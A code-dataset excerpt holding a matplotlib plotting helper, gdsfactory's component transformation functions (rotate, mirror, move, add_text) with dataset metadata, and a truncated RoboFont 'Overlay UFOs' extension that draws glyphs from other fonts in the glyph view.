X, Y = np.meshgrid(np.linspace(a, b, n), np.linspace(c, d, m))
Z = np.zeros(X.shape)
argument = np.zeros(2)
for i in range(X.shape[0]):
for j in range(X.shape[1]):
argument[0] = X[i, j]
argument[1] = Y[i, j]
Z[i][j] = f(argument)
return X, Y, Z
def plot_surf(f):
"""Plot surface graph of function f."""
X, Y, Z = _get_grid(f)
fig = plt.figure()
ax = fig.gca(projection="3d")
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm)
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
fig.colorbar(surf)
plt.title("objective function") | en | 0.762189 | Plots for optimization lecture. Plot contour graph for function f. # Create array from values with at least two dimensions. Create a grid for function f. # create data to visualize objective function # number of discretization points along the x-axis # number of discretization points along the x-axis # extreme points in the x-axis # extreme points in the y-axis Plot surface graph of function f. # Plot the surface. | 3.718405 | 4 |
gdsfactory/functions.py | simbilod/gdsfactory | 0 | 10382
"""All functions return a Component so you can easily pipe or compose them.
There are two types of functions:
- decorators: return the original component
- containers: return a new component
"""
from functools import lru_cache, partial
import numpy as np
from omegaconf import OmegaConf
from pydantic import validate_arguments
from gdsfactory.cell import cell
from gdsfactory.component import Component
from gdsfactory.components.text_rectangular import text_rectangular_multi_layer
from gdsfactory.port import auto_rename_ports
from gdsfactory.types import (
Anchor,
Axis,
ComponentSpec,
Float2,
Layer,
List,
Optional,
Strs,
)
cache = lru_cache(maxsize=None)
def add_port(component: Component, **kwargs) -> Component:
"""Return Component with a new port."""
component.add_port(**kwargs)
return component
@cell
def add_text(
component: ComponentSpec,
text: str = "",
text_offset: Float2 = (0, 0),
text_anchor: Anchor = "cc",
text_factory: ComponentSpec = text_rectangular_multi_layer,
) -> Component:
"""Return component inside a new component with text geometry.
Args:
component: component spec.
text: text string.
text_offset: relative to component anchor. Defaults to center (cc).
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
t = component_new << text_factory(text)
t.move((np.array(text_offset) + getattr(ref.size_info, text_anchor)))
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def add_texts(
components: List[ComponentSpec],
prefix: str = "",
index0: int = 0,
**kwargs,
) -> List[Component]:
"""Return a list of Component with text labels.
Args:
components: list of component specs.
prefix: Optional prefix for the labels.
index0: defaults to 0 (0, for first component, 1 for second ...).
    Keyword Args:
text_offset: relative to component size info anchor. Defaults to center.
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
return [
add_text(component, text=f"{prefix}{i+index0}", **kwargs)
for i, component in enumerate(components)
]
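# Sketch (illustrative values; `gf` is imported the same way as in the
# __main__ block at the bottom of this module):
#   sweep = [gf.components.mmi1x2(length_mmi=length) for length in (5, 10)]
#   labeled = add_texts(sweep, prefix="D", text_anchor="nc")
# yields copies labeled "D0" and "D1" above their bounding boxes.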
@cell
def rotate(
component: ComponentSpec, angle: float = 90, recenter: bool = False
) -> Component:
"""Return rotated component inside a new component.
Most times you just need to place a reference and rotate it.
This rotate function just encapsulates the rotated reference into a new component.
Args:
component: spec.
angle: to rotate in degrees.
recenter: recenter component after rotating.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
origin_offset = ref.origin - np.array((ref.xmin, ref.ymin))
ref.rotate(angle)
if recenter:
ref.move(
origin=ref.center,
destination=np.array((ref.xsize / 2, ref.ysize / 2)) - origin_offset,
)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
rotate90 = partial(rotate, angle=90)
rotate90n = partial(rotate, angle=-90)
rotate180 = partial(rotate, angle=180)
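# The partials above are shorthands: rotate90(c) is rotate(c, angle=90), and
# the "n" suffix marks the negative (clockwise) rotation.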
@cell
def mirror(
component: ComponentSpec, p1: Float2 = (0, 1), p2: Float2 = (0, 0)
) -> Component:
"""Return new Component with a mirrored reference.
Args:
component: component spec.
p1: first point to define mirror axis.
p2: second point to define mirror axis.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.mirror(p1=p1, p2=p2)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
@cell
def move(
component: Component,
origin=(0, 0),
destination=None,
axis: Optional[Axis] = None,
) -> Component:
"""Return new Component with a moved reference to the original component.
Args:
component: to move.
origin: of component.
destination: Optional x, y.
axis: x or y axis.
"""
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.move(origin=origin, destination=destination, axis=axis)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def move_port_to_zero(component: Component, port_name: str = "o1"):
"""Return a container that contains a reference to the original component.
The new component has port_name in (0, 0).
"""
if port_name not in component.ports:
raise ValueError(
f"port_name = {port_name!r} not in {list(component.ports.keys())}"
)
return move(component, -component.ports[port_name].midpoint)
def update_info(component: Component, **kwargs) -> Component:
"""Return Component with updated info."""
component.info.update(**kwargs)
return component
@validate_arguments
def add_settings_label(
component: Component, layer_label: Layer = (66, 0), settings: Optional[Strs] = None
) -> Component:
"""Add a settings label to a component.
Args:
component: spec.
layer_label: for label.
settings: tuple or list of settings. if None, adds all changed settings.
"""
d = (
{setting: component.get_setting(setting) for setting in settings}
if settings
else component.metadata.changed
)
component.add_label(text=OmegaConf.to_yaml(d), layer=layer_label)
return component
__all__ = (
"add_port",
"add_text",
"add_settings_label",
"auto_rename_ports",
"cache",
"mirror",
"move",
"move_port_to_zero",
"rotate",
"update_info",
)
if __name__ == "__main__":
import gdsfactory as gf
c = gf.components.mmi1x2(
length_mmi=10,
decorator=partial(add_settings_label, settings=["name", "length_mmi"]),
)
# c.show()
cr = rotate(component=c)
cr.show()
# cr = c.rotate()
# cr.pprint()
# cr.show()
# cm = move(c, destination=(20, 20))
# cm.show()
# cm = mirror(c)
# cm.show()
# cm = c.mirror()
# cm.show()
# cm2 = move_port_to_zero(cm)
# cm2.show()
# cm3 = add_text(c, "hi")
# cm3.show()
# cr = rotate(component=c)
# cr.show()
# print(component_rotated)
# component_rotated.pprint
# component_netlist = component.get_netlist()
# component.pprint_netlist()
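    # Composition sketch (illustrative): each container returns a new
    # Component, so the helpers chain naturally.
    # c2 = move_port_to_zero(rotate(c, angle=180), port_name="o1")
    # c3 = add_text(c2, text="demo", text_anchor="nc")
    # c3.show()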
| """All functions return a Component so you can easily pipe or compose them.
There are two types of functions:
- decorators: return the original component
- containers: return a new component
"""
from functools import lru_cache, partial
import numpy as np
from omegaconf import OmegaConf
from pydantic import validate_arguments
from gdsfactory.cell import cell
from gdsfactory.component import Component
from gdsfactory.components.text_rectangular import text_rectangular_multi_layer
from gdsfactory.port import auto_rename_ports
from gdsfactory.types import (
Anchor,
Axis,
ComponentSpec,
Float2,
Layer,
List,
Optional,
Strs,
)
cache = lru_cache(maxsize=None)
def add_port(component: Component, **kwargs) -> Component:
"""Return Component with a new port."""
component.add_port(**kwargs)
return component
@cell
def add_text(
component: ComponentSpec,
text: str = "",
text_offset: Float2 = (0, 0),
text_anchor: Anchor = "cc",
text_factory: ComponentSpec = text_rectangular_multi_layer,
) -> Component:
"""Return component inside a new component with text geometry.
Args:
component: component spec.
text: text string.
text_offset: relative to component anchor. Defaults to center (cc).
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
t = component_new << text_factory(text)
t.move((np.array(text_offset) + getattr(ref.size_info, text_anchor)))
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def add_texts(
components: List[ComponentSpec],
prefix: str = "",
index0: int = 0,
**kwargs,
) -> List[Component]:
"""Return a list of Component with text labels.
Args:
components: list of component specs.
prefix: Optional prefix for the labels.
index0: defaults to 0 (0, for first component, 1 for second ...).
keyword Args:
text_offset: relative to component size info anchor. Defaults to center.
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
return [
add_text(component, text=f"{prefix}{i+index0}", **kwargs)
for i, component in enumerate(components)
]
@cell
def rotate(
component: ComponentSpec, angle: float = 90, recenter: bool = False
) -> Component:
"""Return rotated component inside a new component.
Most times you just need to place a reference and rotate it.
This rotate function just encapsulates the rotated reference into a new component.
Args:
component: spec.
angle: to rotate in degrees.
recenter: recenter component after rotating.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
origin_offset = ref.origin - np.array((ref.xmin, ref.ymin))
ref.rotate(angle)
if recenter:
ref.move(
origin=ref.center,
destination=np.array((ref.xsize / 2, ref.ysize / 2)) - origin_offset,
)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
rotate90 = partial(rotate, angle=90)
rotate90n = partial(rotate, angle=-90)
rotate180 = partial(rotate, angle=180)
@cell
def mirror(
component: ComponentSpec, p1: Float2 = (0, 1), p2: Float2 = (0, 0)
) -> Component:
"""Return new Component with a mirrored reference.
Args:
component: component spec.
p1: first point to define mirror axis.
p2: second point to define mirror axis.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.mirror(p1=p1, p2=p2)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
@cell
def move(
component: Component,
origin=(0, 0),
destination=None,
axis: Optional[Axis] = None,
) -> Component:
"""Return new Component with a moved reference to the original component.
Args:
component: to move.
origin: of component.
destination: Optional x, y.
axis: x or y axis.
"""
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.move(origin=origin, destination=destination, axis=axis)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def move_port_to_zero(component: Component, port_name: str = "o1"):
"""Return a container that contains a reference to the original component.
The new component has port_name in (0, 0).
"""
if port_name not in component.ports:
raise ValueError(
f"port_name = {port_name!r} not in {list(component.ports.keys())}"
)
return move(component, -component.ports[port_name].midpoint)
def update_info(component: Component, **kwargs) -> Component:
"""Return Component with updated info."""
component.info.update(**kwargs)
return component
@validate_arguments
def add_settings_label(
component: Component, layer_label: Layer = (66, 0), settings: Optional[Strs] = None
) -> Component:
"""Add a settings label to a component.
Args:
component: spec.
layer_label: for label.
settings: tuple or list of settings. if None, adds all changed settings.
"""
d = (
{setting: component.get_setting(setting) for setting in settings}
if settings
else component.metadata.changed
)
component.add_label(text=OmegaConf.to_yaml(d), layer=layer_label)
return component
__all__ = (
"add_port",
"add_text",
"add_settings_label",
"auto_rename_ports",
"cache",
"mirror",
"move",
"move_port_to_zero",
"rotate",
"update_info",
)
if __name__ == "__main__":
import gdsfactory as gf
c = gf.components.mmi1x2(
length_mmi=10,
decorator=partial(add_settings_label, settings=["name", "length_mmi"]),
)
# c.show()
cr = rotate(component=c)
cr.show()
# cr = c.rotate()
# cr.pprint()
# cr.show()
# cm = move(c, destination=(20, 20))
# cm.show()
# cm = mirror(c)
# cm.show()
# cm = c.mirror()
# cm.show()
# cm2 = move_port_to_zero(cm)
# cm2.show()
# cm3 = add_text(c, "hi")
# cm3.show()
# cr = rotate(component=c)
# cr.show()
# print(component_rotated)
# component_rotated.pprint
# component_netlist = component.get_netlist()
# component.pprint_netlist() | en | 0.634079 | All functions return a Component so you can easily pipe or compose them. There are two types of functions: - decorators: return the original component - containers: return a new component Return Component with a new port. Return component inside a new component with text geometry. Args: component: component spec. text: text string. text_offset: relative to component anchor. Defaults to center (cc). text_anchor: relative to component (ce cw nc ne nw sc se sw center cc). text_factory: function to add text labels. Return a list of Component with text labels. Args: components: list of component specs. prefix: Optional prefix for the labels. index0: defaults to 0 (0, for first component, 1 for second ...). keyword Args: text_offset: relative to component size info anchor. Defaults to center. text_anchor: relative to component (ce cw nc ne nw sc se sw center cc). text_factory: function to add text labels. Return rotated component inside a new component. Most times you just need to place a reference and rotate it. This rotate function just encapsulates the rotated reference into a new component. Args: component: spec. angle: to rotate in degrees. recenter: recenter component after rotating. Return new Component with a mirrored reference. Args: component: component spec. p1: first point to define mirror axis. p2: second point to define mirror axis. Return new Component with a moved reference to the original component. Args: component: to move. origin: of component. destination: Optional x, y. axis: x or y axis. Return a container that contains a reference to the original component. The new component has port_name in (0, 0). Return Component with updated info. Add a settings label to a component. Args: component: spec. layer_label: for label. settings: tuple or list of settings. if None, adds all changed settings. # c.show() # cr = c.rotate() # cr.pprint() # cr.show() # cm = move(c, destination=(20, 20)) # cm.show() # cm = mirror(c) # cm.show() # cm = c.mirror() # cm.show() # cm2 = move_port_to_zero(cm) # cm2.show() # cm3 = add_text(c, "hi") # cm3.show() # cr = rotate(component=c) # cr.show() # print(component_rotated) # component_rotated.pprint # component_netlist = component.get_netlist() # component.pprint_netlist() | 3.036531 | 3 |
OverlayUFOs/Overlay UFOs.roboFontExt/lib/OverlayUFOs.py | connordavenport/fbOpenTools | 0 | 10383
#coding=utf-8
from __future__ import division
"""
# OVERLAY UFOS
For anyone looking in here, sorry the code is so messy. This is a standalone version of a script with a lot of dependencies.
"""
import os
from AppKit import * #@PydevCodeAnalysisIgnore
from vanilla import * #@PydevCodeAnalysisIgnore
from mojo.drawingTools import *
from mojo.events import addObserver, removeObserver
from mojo.extensions import getExtensionDefault, setExtensionDefault, getExtensionDefaultColor, setExtensionDefaultColor
from mojo.UI import UpdateCurrentGlyphView
from fontTools.pens.transformPen import TransformPen
from defconAppKit.windows.baseWindow import BaseWindowController
import unicodedata
#from lib.tools.defaults import getDefaultColor
from lib.tools.drawing import strokePixelPath
from lib.UI.spaceCenter.glyphSequenceEditText import splitText
from builtins import chr
selectedSymbol = u'•'
def SmallTextListCell(editable=False):
cell = NSTextFieldCell.alloc().init()
size = NSSmallControlSize #NSMiniControlSize
cell.setControlSize_(size)
font = NSFont.systemFontOfSize_(NSFont.systemFontSizeForControlSize_(size))
cell.setFont_(font)
cell.setEditable_(editable)
return cell
class TX:
"""
An agnostic way to get a naked font.
"""
@classmethod
def naked(cls, f):
try:
return f.naked()
except:
return f
class Tool():
"""
The tool object manages the font list. This is a simplification.
"""
fonts = AllFonts()
def addObserver(self, target, method, action):
addObserver(target, method, action)
def removeObserver(self, target, method, action):
removeObserver(target, method, action)
def getCurrentFont(self):
return CurrentFont()
def getFonts(self):
u"""Answers the list of selected fonts, ordered by their path.
"""
return self.fonts
def appendToFonts(self, path):
f = OpenFont(path, showUI=False)
self.fonts.append(f)
def removeFromFonts(self, path):
for i, f in enumerate(self.fonts):
if f.path == path:
del self.fonts[i]
def getFontPaths(self):
return [f.path or str(f.info.familyName)+" "+str(f.info.styleName) for f in self.getFonts()]
def getFontLabel(self, path):
if path is None:
return None
if not path:
return 'Untitled'
name = path.split('/')[-1]
status = selectedSymbol
return status, path, name
def getFontLabels(self):
labels = {}
for path in self.getFontPaths():
if path:
label = self.getFontLabel(path)
name = label[-1]
else:
name = 'Untitled'
if not name in labels:
labels[name] = []
labels[name].append(label)
sortedLabels = []
for _, labelSet in sorted(labels.items()):
if len(labelSet) == 1: # There is only a single font with this name
sortedLabels.append(labelSet[0])
else: # Otherwise we'll have to construct new names to show the difference
for status, path, name in sorted(labelSet):
sortedLabels.append((status, path, '%s "%s"' % (name, '/'.join(path.split('/')[:-1]))))
return sortedLabels
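# Example (illustrative): if two open fonts are both named "Font.ufo", the
# labels above become 'Font.ufo "path/one"' and 'Font.ufo "path/two"', so the
# font list can still tell them apart.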
class C:
"""
Some constants.
"""
C2 = 100
BUTTON_WIDTH = 80
STYLE_CHECKBOXSIZE = 'small'
STYLE_LABELSIZE = 'small'
STYLE_RADIOSIZE = 'small'
L = 22
LL = 25
class OverlayUFOs(BaseWindowController):
DEFAULTKEY = "com.fontbureau.overlayUFO"
DEFAULTKEY_FILLCOLOR = "%s.fillColor" %DEFAULTKEY
DEFAULTKEY_STROKECOLOR = "%s.strokeColor" %DEFAULTKEY
DEFAULTKEY_STROKE = "%s.stroke" %DEFAULTKEY
DEFAULTKEY_FILL = "%s.fill" %DEFAULTKEY
FALLBACK_FILLCOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .1)
FALLBACK_STROKECOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .5)
VERSION = 1.0
NAME = u'Overlay UFOs'
MANUAL = u"""In the current glyph window, this will present the view the same glyph from a separate
UFO or set of UFOs.<br/>
This does NOT import the UFO into a background layer. Instead, it renders a outline directly from the UFO into the glyph window view.
<ul>
<li>There is no need to import duplicate data into a background layer.</li>
<li>The source outline is always live; when changes are made to the source, they will automatically
appear in the current without re-importing.</li>
<li>The source font does not need to be opened with a UI.</li>
</ul>
<h3>DIALOG</h3>
<ul>
<li>A floating dialog is present to let you open and select source fonts, fill, stroke, color.</li>
<li>Source Fonts: The default source font list is self.getOpenFonts(). The refresh button will
return this list to self.getOpenFonts().</li>
<li>Adding Fonts: You can manually add fonts by selecting a UFO file.
The UFO file will open without an interface.</li>
<li>Removing Fonts: There are buttons for removing selected fonts and for clearing the source font list.</li>
</ul>
<h3>BUGS/IMPROVEMENTS</h3>
<ul>
<li>Known Issue: The source font is drawn on top of the current font, instead of behind it.
So, it is good to select a color with a low opacity.</li>
<li>Known Bug: If the glyph window for both source and current fonts are open, it is possible
to select and inadvertently edit the source outline in the current window. I don't know how to solve this.</li>
<li>Improvement?: Add options to scale the source font.</li>
<li>Improvement?: Set different colors, fill settings for each font?</li>
</ul>
"""
# Fixed width of the window.
VIEWMINSIZE = 400
VIEWSIZE = VIEWMINSIZE
VIEWMAXSIZE = VIEWMINSIZE
WINDOW_POSSIZE = (130, 20, VIEWSIZE, 260)
WINDOW_MINSIZE = (VIEWMINSIZE, 260)
WINDOW_MAXSIZE = (VIEWMAXSIZE, 260)
def getPathListDescriptor(self):
return [
dict(title='Status', key='status', cell=SmallTextListCell(editable=False), width=12, editable=False),
dict(title='Name', key='name', width=300, cell=SmallTextListCell(editable=False), editable=False),
dict(title='Path', key='path', width=0, editable=False),
]
################
# OBSERVERS AND UPDATERS
################
def fontSelectionChanged(self):
self.setSourceFonts()
def activateModule(self):
self.tool.addObserver(self, 'drawInactive', 'drawInactive')
self.tool.addObserver(self, 'drawBackground', 'drawBackground')
self.tool.addObserver(self, 'fontDidOpen', 'fontDidOpen')
self.tool.addObserver(self, 'fontWillClose', 'fontWillClose')
def deactivateModule(self):
removeObserver(self, 'drawBackground')
removeObserver(self, 'drawInactive')
removeObserver(self, 'fontDidOpen')
removeObserver(self, 'fontWillClose')
################
# CONTEXTS
################
def fontDidOpen(self, info):
font = info.get('font')
if font:
self.tool.fonts.append(font)
self.refreshCallback()
def fontWillClose(self, info):
font = info.get('font')
path = font.path
if path:
self.tool.removeFromFonts(path)
self.refreshCallback()
def __init__(self):
self.tool = Tool()
self.w = FloatingWindow((400, 200), "Overlay UFOs", minSize=(400, 200))
self.populateView()
self.getView().open()
def getView(self):
return self.w
def refreshCallback(self, sender=None):
"""
Update the font list.
"""
self.getView().fontList.set(self.getFontItems())
def resetCallback(self, sender=None):
"""
Resets the view to the currently opened fonts.
"""
self.tool.fonts = AllFonts()
self.getView().fontList.set(self.getFontItems())
def addCallback(self, sender=None):
"""
Open a font without UI and add it to the font list.
"""
f = OpenFont(None, showUI=False)
if f is None:
return
self.tool.appendToFonts(f.path)
self.refreshCallback()
def populateView(self):
"""
The UI
"""
self.fillColor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
self.strokeColor = getExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, self.FALLBACK_STROKECOLOR)
self.contextBefore = self.contextAfter = ''
# Populating the view can only happen after the view is attached to the window,
# or else the relative widths go wrong.
view = self.getView()
view.add = Button((-40, 3, 30, 22), '+', callback=self.addCallback)
view.reset = Button((-40, 30, 30, 22), chr(8634), callback=self.resetCallback)
# Flag to see if the selection list click is in progress. We are resetting the selection
# ourselves, using the list "buttons", but changing that selection will cause another
# list update, that should be ignored.
self._selectionChanging = False
# Indicate that we are a drawing module
self._canDraw = True
self.sources = []
x = y = 4
view.fontList = List((C.C2, y, 250, -65), self.getFontItems(),
selectionCallback=self.fontListCallback,
drawFocusRing=False,
enableDelete=False,
allowsMultipleSelection=False,
allowsEmptySelection=True,
drawHorizontalLines=True,
showColumnTitles=False,
columnDescriptions=self.getPathListDescriptor(),
rowHeight=16,
)
view.viewEnabled = CheckBox((x, y, C.BUTTON_WIDTH, 22), "Show",
callback=self.viewCallback, sizeStyle=C.STYLE_CHECKBOXSIZE,
value=True)
y += C.L
view.fill = CheckBox((x, y, 60, 22), "Fill", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "fill"), True),
value = True,
callback=self.fillCallback)
y += C.L
color = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
view.color = ColorWell((x, y, 60, 22),
color=color,
callback=self.colorCallback)
y += C.L + 5
view.stroke = CheckBox((x, y, 60, 22), "Stroke", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "stroke"), False),
value = False,
callback=self.strokeCallback)
y += C.LL
view.alignText = TextBox((x, y, 90, 50), 'Alignment', sizeStyle=C.STYLE_LABELSIZE)
y += C.L
view.align = RadioGroup((x, y, 90, 50), ['Left', 'Center', 'Right'], isVertical=True,
sizeStyle=C.STYLE_RADIOSIZE, callback=self.alignCallback)
view.align.set(0)
#view.contextLabel = TextBox((C.C2, -58, 90, 50), 'Contexts', sizeStyle=C.STYLE_LABELSIZE)
view.viewCurrent = CheckBox((C.C2, -60, 150, 22), "Always View Current", sizeStyle=C.STYLE_CHECKBOXSIZE,
value = False,
callback=self.contextEditCallback)
#view.contextUandlc = CheckBox((C.C2+170, -60, 85, 22), "Match Case", sizeStyle=C.STYLE_CHECKBOXSIZE,
# value = False,
# callback=self.contextEditCallback)
view.contextBefore = EditText((C.C2, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Left Context')
view.contextCurrent = EditText((C.C2+95, -30, 60, 20), callback=self.contextCurrentEditCallback, continuous=True, sizeStyle="small")
view.contextAfter = EditText((C.C2+165, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Right Context')
self.activateModule()
self.setUpBaseWindowBehavior()
def fontListCallback(self, sender):
u"""If there is a selection, toggle the status of these fonts."""
# Avoid recursive loop because of changing font selection
if not self._selectionChanging:
for selectedIndex in sender.getSelection():
item = sender.get()[selectedIndex]
if item['status']:
item['status'] = ''
else:
item['status'] = selectedSymbol
# If shift is held when pressing an entry in the font list,
# the non-selected fonts will swap with the current's state
if NSEvent.modifierFlags() & NSShiftKeyMask:
items = [sender.get()[i] for i in range(len(sender.get())) if i != selectedIndex]
for subItems in items:
if item['status'] == '':
subItems['status'] = selectedSymbol
else:
subItems['status'] = ''
self._selectionChanging = True
# Avoid recursive loop because of changing font selection
sender.setSelection([])
self._selectionChanging = False
self.updateView()
def canDraw(self):
return True
"""
There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
"""
#def isUpper(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Lu':
# return True
# return False
#def isLower(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Ll':
# return True
# return False
def getHiddenFont(self, path):
from builtins import str
for f in self.tool.getFonts():
if f.path == path:
return f
elif path == str(f.info.familyName)+" "+str(f.info.styleName):
return f
def drawBackground(self, info):
u"""Draw the background of defined glyphs and fonbts.
Scale is available as mouse.scale."""
view = self.getView()
if not view.viewEnabled.get():
return
fill = getExtensionDefault(self.DEFAULTKEY_FILL, True)
stroke = getExtensionDefault(self.DEFAULTKEY_STROKE, True)
fillcolor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
glyph = info.get('glyph')
if glyph is not None:
current = glyph.getParent()
else:
current = self.tool.getCurrentFont()
if glyph is None or current is None:
return
align = self.getAlignment()
# Get the fonts from the list and see if they are selected.
sourceItems = self.getSourceFonts()
showFonts = []
for item in sourceItems:
if not item['status']:
continue
path = item['path']
font = self.getHiddenFont(path)
showFonts.append(font)
if view.viewCurrent.get() and current not in showFonts:
showFonts.append(current)
for font in showFonts:
self.fillColor.setFill()
self.strokeColor.setStroke()
contextBefore, contextCurrent, contextAfter = self.getContexts()
if font is not None:
contextBefore = splitText(contextBefore, TX.naked(font).unicodeData, TX.naked(font).groups)
contextBefore = [font[gname] for gname in contextBefore if gname in font.keys()]
contextAfter = splitText(contextAfter, TX.naked(font).unicodeData, TX.naked(font).groups)
contextAfter = [font[gname] for gname in contextAfter if gname in font.keys()]
contextCurrent = splitText(contextCurrent, TX.naked(font).unicodeData, TX.naked(font).groups)
if len(contextCurrent) > 0:
contextCurrent = [font[gname] for gname in [contextCurrent[0]] if gname in font.keys()]
if len(contextCurrent) > 0:
sourceGlyph = contextCurrent[0]
else:
sourceGlyph = None
elif glyph.name in font.keys():
sourceGlyph = font[glyph.name]
else:
sourceGlyph = None
"""
#There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
if view.contextUandlc.get():
caseTransform = None
if self.isUpper(glyph):
caseTransform = FontTX.unicodes.getUpperFromLower
elif self.isLower(glyph):
caseTransform = FontTX.unicodes.getLowerFromUpper
if caseTransform:
for i, g in enumerate(contextBefore):
newG = caseTransform(g)
if newG is not None:
contextBefore[i] = newG
newG = caseTransform(sourceGlyph)
if newG is not None:
sourceGlyph = newG
if caseTransform:
for i, g in enumerate(contextAfter):
newG = caseTransform(g)
if newG is not None:
contextAfter[i] = newG
"""
scale(current.info.unitsPerEm/float(font.info.unitsPerEm))
widthOffset = 0
if sourceGlyph is not None:
if align == 'center':
destCenter = float(glyph.width/2) / current.info.unitsPerEm
sourceCenter = float(sourceGlyph.width/2) / font.info.unitsPerEm
widthOffset = (destCenter-sourceCenter) * font.info.unitsPerEm
elif align == 'right':
widthOffset = ( ( glyph.width / glyph.getParent().info.unitsPerEm ) - (sourceGlyph.width / sourceGlyph.getParent().info.unitsPerEm ) ) * font.info.unitsPerEm
translate(widthOffset, 0)
previousGlyph = sourceGlyph
contextBefore.reverse()
totalWidth = 0
for i, cbGlyph in enumerate(contextBefore):
kernValue = 0
if previousGlyph is not None and previousGlyph.getParent() == cbGlyph.getParent():
# Uncomment to activate kerning. Requires FontTX.
#kernValue += FontTX.kerning.getValue((previousGlyph.name, cbGlyph.name), font.kerning, font.groups)
kernValue += 0
translate(-cbGlyph.width-kernValue, 0)
totalWidth += cbGlyph.width + kernValue
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
previousGlyph = cbGlyph
translate(totalWidth, 0)
totalWidth = 0
contextCurrentAndAfter = [sourceGlyph]+contextAfter
for i, cbGlyph in enumerate(contextCurrentAndAfter):
if cbGlyph is None:
cbGlyph = sourceGlyph
nextGlyph = None
if i + 1 < len(contextCurrentAndAfter):
nextGlyph = contextCurrentAndAfter[i+1]
if (i == 0 and cbGlyph == glyph) or sourceGlyph is None:
pass
else:
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
kernValue = 0
if cbGlyph is not None and nextGlyph is not None and nextGlyph.getParent() == cbGlyph.getParent():
#kernValue = FontTX.kerning.getValue((cbGlyph.name, nextGlyph.name), font.kerning, font.groups)
# Uncomment to activate kerning. Requires FontTX.
kernValue = 0
width = 0
if cbGlyph is not None:
width = cbGlyph.width
translate(width+kernValue, 0)
totalWidth += width + kernValue
previousGlyph = cbGlyph
translate(-totalWidth, 0)
translate(-widthOffset, 0)
scale(font.info.unitsPerEm/float(current.info.unitsPerEm))
#restore()
drawInactive = drawBackground
def viewCallback(self, sender):
self.updateView()
def getSourceFonts(self):
"""
Get the fonts in the list.
"""
view = self.getView()
return view.fontList.get()
def setSourceFonts(self):
u"""
Set the font list from the current set of open fonts.
"""
view = self.getView()
labels = []
currentSelection = []
for d in self.getSourceFonts():
if d['status']:
currentSelection.append(d['path'])
for status, path, name in self.tool.getFontLabels():
if path in currentSelection:
status = selectedSymbol
else:
status = ''
labels.append(dict(status=status, path=path, name=name))
view.fontList.set(labels)
def colorCallback(self, sender):
"""
Change the color.
"""
selectedColor = sender.get()
r = selectedColor.redComponent()
g = selectedColor.greenComponent()
b = selectedColor.blueComponent()
a = 1
strokeColor = NSColor.colorWithCalibratedRed_green_blue_alpha_(r, g, b, a)
setExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, selectedColor)
setExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, strokeColor)
self.fillColor = selectedColor
self.strokeColor = strokeColor
self.updateView()
def fillCallback(self, sender):
"""
Change the fill status.
"""
setExtensionDefault(self.DEFAULTKEY_FILL, sender.get())
self.updateView()
def strokeCallback(self, sender):
"""
Change the stroke status.
"""
setExtensionDefault(self.DEFAULTKEY_STROKE, sender.get())
self.updateView()
def alignCallback(self, sender):
"""
Change the alignment status.
"""
self.updateView()
def getAlignment(self):
"""
Get the alignment as a string.
"""
view = self.getView()
index = view.align.get()
if index == 0:
return 'left'
elif index == 1:
return 'center'
elif index == 2:
return 'right'
